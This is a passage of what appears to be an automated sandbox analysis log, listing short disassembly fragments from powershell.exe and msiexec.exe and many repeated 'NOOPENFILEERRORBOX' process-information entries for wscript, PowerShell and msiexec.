              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08BE481C push edi; ret 5_2_08BE4827
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08BE21B7 push 0B00A0BCh; ret 5_2_08BE21C2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08BE1D94 push ecx; ret 5_2_08BE1D96
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08BE2FFB push FFFFFFB1h; ret 5_2_08BE3034
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08BE1367 push es; iretd 5_2_08BE1369
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08BE1956 push ebp; iretd 5_2_08BE197A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FD06E8 push eax; ret 7_2_02FD0702
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FD0728 push eax; ret 7_2_02FD0732
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FD0718 push eax; ret 7_2_02FD0722
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FD0708 push eax; ret 7_2_02FD0712
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0447481C push edi; ret 7_2_04474827
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04471956 push ebp; iretd 7_2_0447197A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04471D94 push ecx; ret 7_2_04471D96
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_044721B7 push 0B00A0BCh; ret 7_2_044721C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04470A8D push eax; iretd 7_2_04470A94
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04471367 push es; iretd 7_2_04471369
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04472FFB push FFFFFFB1h; ret 7_2_04473034
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
